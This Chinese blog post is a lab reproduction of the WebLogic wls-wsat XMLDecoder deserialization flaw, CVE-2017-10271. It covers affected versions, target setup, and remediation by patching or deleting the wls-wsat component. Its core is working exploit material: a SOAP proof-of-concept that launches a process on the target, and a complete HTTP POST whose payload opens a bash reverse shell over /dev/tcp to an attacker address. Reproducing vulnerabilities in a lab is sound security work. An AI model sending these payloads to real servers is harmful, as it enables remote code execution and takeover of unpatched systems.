2. 程式人生 > >Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現

Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現

阿新 發佈:2019-07-13

Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現

一、漏洞概述 

WebLogic的 WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。

二、漏洞版本

受影響WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

三、漏洞復現環境搭建

1、所需環境 目標機:安裝weblogic 10.3.6.0 攻擊機:win10 安裝burpsuit

2、配置java環境

  

3、安裝Weblogic

3.1 官網下載(https://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html),執行軟體

  

3.2不勾選 “我希望通過My Oracle Support接收安全更新"

  

3.3設定使用者名稱以及密碼

  

3.4選擇生產模式

  

3.5若安裝選擇的預設路徑與預設域名,在如下路徑中執行,輸入使用者名稱以及密碼,執行weblogic服務C:\Oracle\Middleware\user_projects\domains\base_domain\WebLogic.cmd

  

3.6本地環境測試,出現如下圖,說明weblogic環境搭建成功

  

3.7 win10測試訪問http://192.168.10.171:7001/wls-wsat/CoordinatorPortType

  

四、漏洞復現

1、訪問http://192.168.10.171:7001/wls-wsat/CoordinatorPortType,存在下圖則說明存在漏洞

  

2、漏洞驗證(POC)

2.1Poc如下,在目標計算機上呼叫計算器

<soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
       <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
           <java      version="1.8" class="java.beans.XMLDecoder">
               <void     class="java.lang.ProcessBuilder">
                    <array    class="java.lang.String" length="3">
                        <void     index="0">
                           <string>calc</string>
                        </void>
                        <void     index="1">
                            <string></string>
                        </void>
                        <void     index="2">
                            <string> </string>
                        </void>
                    </array>
                <void     method="start"/></void>
           </java>
       </work:WorkContext>
   </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

2.2構造post資料包,並新增Content-text/xml, 把Cache-Control修改為no-cache

  

2.3傳送資料包,可以看到返回的狀態碼為500

  

2.4檢視目標機器,看到看到目標機器的計算器已經被呼叫

   

五、漏洞防禦

1、 升級本版本

2、 刪除根據實際環境路徑,刪除WebLogic wls-wsat元件

C:\Oracle\Middleware\wlserver_10.3\server\lib\ wls-wsat.war

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\.internal\ wls-wsat.war

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat

2.1刪除wls-wsat元件,然後重啟WebLogic服務

2.2瀏覽器訪問,如下圖,說明漏洞不存在

  

 

 

使用ubuntu 16.04搭建docker vulhub漏洞環境搭建 

vulhub漏洞環境搭建參考: https://blog.csdn.net/qq_36374896/article/details/84102101

使用vulhub漏洞環境復現CVE-2017-10271,參考文件:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271

1.啟動測試環境

docker-compose up -d

2.瀏覽器訪問http://172.17.0.1:7001/wls-wsat/CoordinatorPortType

3.構造post資料包,反彈shell   #注意反彈shell需要把特殊字元進行編碼(html轉義符對特殊符號進行轉換或者利用burpsuit使用html編碼), 否則解析XML的時候將出現格式錯誤

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 172.17.0.1:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type:text/xml
Content-Length: 641

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.135/7777 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

  

4.此時檢視kali,可以看到成功反彈shell

  

&n

相關推薦

Weblogic &#39;wls-wsat&#39; XMLDecoder 序列_CVE-2017-10271漏洞復現

Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現 一、漏洞概述  WebLogic的 WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏

Weblogic 小於10.3.6 &#39;wls-wsat&#39; XMLDecoder 序列漏洞(CVE-2017-10271

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。 沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。 12.2.1.2.0下載: https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_

Weblogic XMLDecoder 序列漏洞(CVE-2017-10271)檢測與利用復現

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。 漏洞環境搭建 可以參考: https://blog.csdn.net/q

XMLDecoder序列漏洞

xmldecoder java 反序列化 Java 調用XMLDecoder解析XML文件的時候,存在命令執行漏洞。樣例XML文件如下所示:<?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_131" class

WebLogic 10.3.6.0 升級序列漏洞補丁

成功 wget命令 下載 攻擊 generic 價格 server move 被黑 由於最近比特幣被炒到近乎不可思議的價格,所以網絡上的肉雞都被黑產們一個個培養成了挖礦雞。今兒就聊聊如何進行WebLogic10的反序列化漏洞的升級方法。 1、修改bsu.sh 把內存

懸鏡安全丨Java 序列任意程式碼執行漏洞分析與利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

fastJson序列異常,JSONException: expect &#39;:&#39; at 0, actual =

com.alibaba.fastjson.JSONException: expect ':' at 0, actual = at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:29

weblogic AND jboss 序列漏洞

我們 cat logic -- ram icc 訪問 web訪問 驗證 C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF serve

weblogic序列漏洞 cve-2018-3245

type 技術 序列化 int live 查看 efs intent loader weblogic反序列化漏洞 CVE-2018-3245 0x00 針對cve-2018-2893的修復 針對JRMP反序列化修復的方式依舊是增加黑名單:黑名單package:java.rm

(轉)Weblogic序列高危漏洞

轉自:http://www.sohu.com/a/154670296_99890213?qq-pf-to=pcqq.c2c 我選擇的是第五種方法解決的。 一、WebLogic Server Security Alert 安全問題描述 WebLogic Server反序列化安全漏洞補丁:C

WebLogic T3 序列繞過漏洞(CVE-2018-2893)檢測POC

WebLogic T3 反序列化繞過漏洞(CVE-2018-2893)檢測POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-201

記錄WebLogic(CVE-2017-10271)序列漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

weblogic序列漏洞

1、檢測工具 https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271 2、http請求模擬工具 Fiddler 3、檢測方法 ontent-Type: text/xml <soapenv:Envelope

WebLogic序列漏洞CVE-2018-2628漏洞檢測與利用

Oracle官方釋出了4月份的關鍵補丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可導致遠端程式碼執行漏洞,漏洞威脅等級為高危,對應的CVE編號為CVE-2018-26 影響版本 Oracle WebLogic Se

WebLogic序列漏洞的利用與防禦

0x00 前言 上週出的 WebLogic 反序列漏洞,跟進分析的時候發現涉及到不少 Java 反序列化的知識,然後借這個機會把一些 Java 反序列化漏洞的利用與防禦需要的知識點重新捋一遍,做了一些測試和除錯後寫成這份報告。文中若有錯漏之處,歡迎指出。 0x01 J

weblogic之CVE-2016-0638序列分析

acf ext fun for 打印 collect 一個 需求 gic 此漏洞是基於CVE-2015-4852漏洞進行黑名單的繞過,CVE-2015-4852補丁主要應用在三個位置上 weblogic.rjvm.InboundMsgAbbrev.class :: Serv

weblogic之CVE-2016-3510序列分析

ssg tps 生成 args pac 腳本 github ren aliyun 將反序列化的對象封裝進了weblogic.corba.utils.MarshalledObject,然後再對MarshalledObject進行序列化,生成payload字節碼。由於Mars

linux環境下weblogic 10.3.6打17年10月份最新的序列補丁包

針對反序列化漏洞最新的補丁修補方案如下: 針對weblogic10.3.6版本 第一步 解壓p26519424_1036_Generic.zip檔案到{MW_HOME}/util/bsu/cache_dir如果沒有cache_dir資料夾則新建即可。第二步(如果沒有打過ZLN

Weblogic序列漏洞(CVE-2018-2628),T3協議白名單

 2018年4月18日凌晨,Oracle官方釋出了4月份的關鍵補丁更新,其中包含一個高危的Weblogic反序列化漏洞(CVE-2018-2628),通過該漏洞,攻擊者可以在未授權的情況下遠端執行程式碼。攻擊者只需要傳送精心構造的T3協議資料,就可以獲取目標伺服器的許可權。 

WebLogic序列漏洞(CVE-2017-3248)

使用Java 7和Java 8均可成功復現。 漏洞復現 先啟動weblogic(終端#1) ➜ base_domain ./startWebLogic.sh 在某埠監聽(接收反彈shell) ➜ ysoserial nc -klv 7777 Listeni